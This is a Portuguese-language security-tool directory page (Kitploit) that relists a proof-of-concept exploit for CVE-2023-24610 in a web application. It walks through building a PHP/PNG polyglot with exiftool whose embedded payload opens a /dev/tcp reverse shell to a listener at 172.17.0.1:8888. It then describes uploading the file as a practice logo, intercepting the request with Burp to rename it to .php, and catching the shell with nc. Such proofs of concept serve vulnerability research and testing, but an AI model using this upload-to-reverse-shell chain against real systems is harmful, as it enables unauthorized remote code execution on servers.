Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-24610 — Isto é uma prova de conceito para CVE-2023-24610 | Kitploit
Ferramentas/GitHubGitHub/abbisqq/cve-2023-24610
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubabbisqq/cve-2023-24610

CVE-2023-24610

Isto é uma prova de conceito para CVE-2023-24610

Ver Repositório
3há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-24610

Este é um proof of concept para CVE-2023-24610

Começamos criando um arquivo poliglota usando o exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

nosh1

Alteramos o arquivo para png para que ele passe na verificação do front-end

nosh2

Depois disso, iniciamos um listener nc na porta 8888 para receber a shell.

nosh3

O próximo passo é fazer login na aplicação e clicar em setup

nosh4

Na parte inferior da página, vemos uma área de logo da prática. Podemos fazer upload de um arquivo usando o botão de editar no lado direito

nosh5

Clicamos em editar e depois em procurar, selecionamos o arquivo ".png" que criamos no primeiro passo

nosh6

Antes de clicar em upload, nos certificamos de interceptar a requisição com o burp ou algo similar. Clicamos em upload e, no burp, alteramos a extensão do arquivo de "png" para "php"

nosh7

Desligamos a interceptação para que nosso arquivo seja enviado e verificamos o listener nc que iniciamos anteriormente. Temos uma reverse shell e o IP aponta para nosso container docker.

nosh8

Baixar ferramenta